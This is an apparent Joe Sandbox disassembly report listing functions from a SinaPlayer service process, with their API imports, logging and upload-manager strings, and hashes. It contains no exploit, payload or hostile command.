                                                                                                                                                                                                    • Instruction Fuzzy Hash: A21292B1C00259EEEF22EBA4CC05BDEBBB4AB11304F1445E9E409BB292D7755E88CF51
                                                                                                                                                                                                    Function 003782F0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 233threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,00000000), ref: 00378341
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00378364
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037839E
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003783D8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003783F5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00378412
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 00378435
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00378446
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00378460
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037847E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037848D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003784DE
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003784EA
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 003784F3
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(00000054,00000001), ref: 0037852F
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(000000A8,00000000), ref: 0037853A
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00378542
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378562
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00378577
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378592
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 003785AA
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003785C7
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 003785E5
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378602
                                                                                                                                                                                                    • ?clear@FilePath@base@@QAEXXZ.BASE(?), ref: 00378644
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$File$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@Path@base@@V01@$??6?$basic_ostream@?width@ios_base@std@@Unlock@?$basic_streambuf@$?sputc@?$basic_streambuf@DeletePath@1@_U?$char_traits@_W@base@@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?clear@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $CleanTempFiles$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3701126544-2824641664
                                                                                                                                                                                                    • Opcode ID: d1bb983106643f4f0ac0b710eff4c75a83f5e1fca4e692aabf717504a1a7b49f
                                                                                                                                                                                                    • Instruction ID: a573b8ff085701edef469ea2c5fba3b60c5d909c206f9a3e52fe46af66723a11
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1bb983106643f4f0ac0b710eff4c75a83f5e1fca4e692aabf717504a1a7b49f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7A15F75A002189FDF21EF68D889B9DB7B4FF08304F0485A9EC19AB352DB75A944CF60
                                                                                                                                                                                                    Function 0038C640 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 181windowthreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(003AC14C), ref: 0038C682
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038C6A6
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0038C6C7
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038C701
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0038C745
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0038C765
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038C782
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038C7A5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038C7B6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038C7D0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038C7E1
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0038C7E9
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0038C807
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038C816
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038C864
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038C870
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038C879
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038C886
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000140,000000FF), ref: 0038C8A6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0038C8CE
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038C8E6
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0038C8F3
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(003AC14C), ref: 0038C910
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$Interlocked$?sputc@?$basic_streambuf@IncrementMessage@logging@@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugDecrementHelper@logging@@LevelOsfx@?$basic_ostream@OutputStringThreadTickV01@@Vlog
                                                                                                                                                                                                    • String ID: crash_cnt_before_upgrade_ = $)#sinaclient#[$)- $breakpad\tools\crash_service.cc$client end. pid = $Vll
                                                                                                                                                                                                    • API String ID: 3965199131-2379291016
                                                                                                                                                                                                    • Opcode ID: b13b49c893e7dd691ca612e835e8197077786d6fc31f25d17da92b087360750a
                                                                                                                                                                                                    • Instruction ID: d6eaf128662c8f0598851a955d270ec85d8e128f4b1455ec9f9843b830a4df45
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b13b49c893e7dd691ca612e835e8197077786d6fc31f25d17da92b087360750a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8717375A00208AFCF12EFA4ED4ABDDBBB8FB15305F0045A9E40AE7291DB759A44CF51
                                                                                                                                                                                                    Function 0037C0E0 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 256timethreadwindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037C13D
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C160
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C19A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C1DD
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037C1FD
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C21A
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037C23D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C24E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037C268
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120 ref: 0037C279
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037C281
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037C29F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037C2AE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C2FF
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C30B
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C317
                                                                                                                                                                                                    • ?FromSeconds@TimeDelta@base@@SA?AV12@_J@Z.BASE(?,?,?,?,Function_0000B110,00000000,?,?), ref: 0037C3B5
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE ref: 0037C3C9
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(UploadMgr::StatComplete,upload_mgr.cpp,00000121,00000000), ref: 0037C3E2
                                                                                                                                                                                                    • ?PostDelayedTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@VTimeDelta@2@@Z.BASE(00000001,00000000,?,00000000), ref: 0037C408
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0037C418
                                                                                                                                                                                                      • Part of subcall function 0037DA80: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037DCC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$??3@?sputc@?$basic_streambuf@Location@tracked_objects@@TimeU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Base@internal@base@@CallbackCallback@$$CountCounter@tracked_objects@@CurrentD@std@@@1@@DebugDelayedDelta@2@@Delta@base@@FromLoop@base@@MessageOsfx@?$basic_ostream@OutputPostProgramSeconds@StringTask@ThreadTickV01@@V01@_V12@_Z@2@
                                                                                                                                                                                                    • String ID: thread_ptr = $)#sinaclient#[$)- $StatComplete stat_suc = $UploadMgr::StatComplete$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3876395713-1710819069
                                                                                                                                                                                                    • Opcode ID: d0b8e80a33a753fbcfb82adf9bf877aa4d6b543ea4042ebfeb361a816e30166a
                                                                                                                                                                                                    • Instruction ID: 6e83881fe19daf72d86adafca2701ccb36fefa92ec247646cffee7cf77d85d8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0b8e80a33a753fbcfb82adf9bf877aa4d6b543ea4042ebfeb361a816e30166a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DB17171A00209EFCF26DFA4DD49BEDB7B8FB04304F1485A9E409A7291EB359A44CF61
                                                                                                                                                                                                    Function 00398960 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,6C6C2BA0,00000000,00000000), ref: 003989A1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?,8285FFAB), ref: 0037F8D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,Sina,Sina), ref: 0037F944
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F953
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F95C
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F972
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,SinaPlayer,SinaPlayer), ref: 0037F9D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F9DA
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F9E3
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F9F9
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?), ref: 003989F6
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 00398A10
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398A53
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398A7F
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,backup_ver,0000000A), ref: 00398AB6
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398AC9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398AFA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398B26
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,cur_ver,00000007), ref: 00398B5D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398B70
                                                                                                                                                                                                    • ??0JSONStringValueSerializer@@QAE@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000), ref: 00398B82
                                                                                                                                                                                                    • ?Serialize@JSONStringValueSerializer@@UAE_NABVValue@base@@@Z.BASE(00000000), ref: 00398B9A
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 00398BAA
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00398BB5
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00398BD0
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 00398BE0
